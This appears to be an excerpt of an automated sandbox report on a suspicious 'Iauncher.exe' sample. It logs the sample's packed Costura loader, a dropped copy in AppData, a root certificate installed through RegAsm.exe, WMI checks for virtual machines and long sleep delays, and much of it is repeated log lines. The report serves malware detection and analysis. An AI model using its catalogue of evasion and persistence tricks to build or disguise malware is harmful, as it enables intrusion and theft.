                          Source: Iauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressedlB source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Iauncher.exe
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains potential unpacker
                          Source: Iauncher.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Yara detected Costura Assembly Loader
                          Source: Yara matchFile source: Iauncher.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Iauncher.exe.590000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1184729227.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Iauncher.exe PID: 6692, type: MEMORYSTR
                          Source: Iauncher.exeStatic PE information: 0xACDA9736 [Wed Nov 23 21:25:10 2061 UTC]
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05D6E7BB push eax; ret 0_2_05D6E7C1
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05DB8940 push esp; ret 0_2_05DB8941
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09CA36D7 push ebx; iretd 0_2_09CA36DA
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_005959B6 push es; retn 0000h11_2_00595AC6
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595AD8 push es; retn 0000h11_2_00595AC6
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595AD8 push es; ret 11_2_00595AD5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595AC9 push es; retn 0000h11_2_00595AC6
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595AC9 push es; ret 11_2_00595AD5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_005662BA push ecx; ret 11_2_005662CD
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595B45 push es; retf 0000h11_2_00595B32
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_00595B45 push es; retf 11_2_00595B42
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05D81015 push FFFFFF8Bh; ret 13_2_05D8101A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DA804D push ecx; iretd 13_2_05DA8052
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_05DAECF2 push eax; ret 13_2_05DAED01
                          Source: Iauncher.exeStatic PE information: section name: .text entropy: 7.90237020530487

                          Persistence and Installation Behavior

                          barindex
                          Installs new ROOT certificates
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeFile created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: AC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598888Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598766Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 598094Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597984Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 597094Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596984Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596656Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596547Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596437Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596328Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596219Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 596109Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595999Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595875Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595765Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595647Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595531Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595422Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595312Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595203Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 595093Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594969Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594859Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594640Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 594531Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeWindow / User API: threadDelayed 7148Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeWindow / User API: threadDelayed 2710Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1414Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1592Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 4204Thread sleep time: -599437s >= -30000sJump to behavior
